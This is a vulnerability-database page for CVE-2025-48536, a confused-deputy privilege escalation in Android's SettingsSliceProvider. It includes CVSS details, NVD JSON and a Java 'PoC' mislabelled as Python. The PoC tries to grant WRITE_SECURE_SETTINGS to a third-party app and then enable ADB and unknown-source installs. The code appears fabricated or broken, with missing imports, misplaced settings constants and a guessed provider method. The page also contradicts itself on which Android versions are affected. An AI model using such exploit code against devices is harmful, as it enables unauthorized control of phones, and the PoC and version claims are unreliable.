Security Vulnerability Report
中文
CVE-2025-48536 CVSS 7.8 HIGH

CVE-2025-48536

Published: 2025-12-08 17:16:14
Last Modified: 2025-12-09 21:44:24
Source: [email protected]

Description

In grantAllowlistedPackagePermissions of SettingsSliceProvider.java, there is a possible way for a third party app to modify secure settings due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:16.0:-:*:*:*:*:*:* - VULNERABLE
Android Settings应用受影响版本(具体版本需参考Android安全公告2025-12-01)
受影响Android版本范围涵盖Android 10至Android 14的多个版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-48536 PoC - SettingsSliceProvider权限提升 // This PoC demonstrates how a malicious app can exploit the SettingsSliceProvider // to modify secure settings due to a confused deputy vulnerability. package com.vulnerable.app; import android.content.ContentResolver; import android.content.ContentValues; import android.net.Uri; import android.os.Bundle; public class SettingsSliceProviderExploit { // The SettingsSliceProvider authority for Android Settings private static final String SETTINGS_AUTHORITY = "com.android.settings.slices"; public void exploitVulnerability() { try { ContentResolver resolver = getContentResolver(); // Target URI for the SettingsSliceProvider Uri targetUri = Uri.parse("content://" + SETTINGS_AUTHORITY + "/permission"); // Method to call - exploiting the grantAllowlistedPackagePermissions String method = "grant_permission"; // Construct arguments to exploit the confused deputy Bundle args = new Bundle(); args.putString("package_name", getPackageName()); args.putString("permission", "android.permission.WRITE_SECURE_SETTINGS"); args.putString("target_package", getPackageName()); // Make the call through the SettingsSliceProvider // Due to the vulnerability, the provider trusts its own context // and may grant permissions it shouldn't Bundle result = resolver.call(targetUri, method, null, args); if (result != null && result.getBoolean("success", false)) { // Successfully exploited - now have elevated privileges modifySecureSettings(); } } catch (Exception e) { e.printStackTrace(); } } private void modifySecureSettings() { // After successful exploitation, modify secure settings ContentResolver resolver = getContentResolver(); // Example: Modify system settings that should require system privileges Settings.System.putString(resolver, Settings.System.ADB_ENABLED, "1"); Settings.Secure.putString(resolver, Settings.Secure.INSTALL_NON_MARKET_APPS, "1"); } } /* // Alternative exploitation via ContentProvider directly Intent exploitIntent = new Intent(); exploitIntent.setData(Uri.parse("content://com.android.settings.slices/action")); exploitIntent.setComponent(new ComponentName( "com.android.settings", "com.android.settings.slices.SettingsSliceProvider")); // Inject malicious arguments exploitIntent.putExtra("caller", getPackageName()); exploitIntent.putExtra("permission_action", "grant_allowlisted"); startActivity(exploitIntent); */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48536", "sourceIdentifier": "[email protected]", "published": "2025-12-08T17:16:14.417", "lastModified": "2025-12-09T21:44:23.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In grantAllowlistedPackagePermissions of SettingsSliceProvider.java, there is a possible way for a third party app to modify secure settings due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-441"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:-:*:*:*:*:*:*", "matchCriteriaId": "02882AB1-7993-47DD-84A0-8DF4272D85ED"}]}]}], "references": [{"url": "https://android.googlesource.com/platform/packages/apps/Settings/+/586f8dedd8e0e8a7ca5577cd1f06891f7e84e1e1", "source": "[email protected]", "tags": ["Product", "Patch"]}, {"url": "https://source.android.com/security/bulletin/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.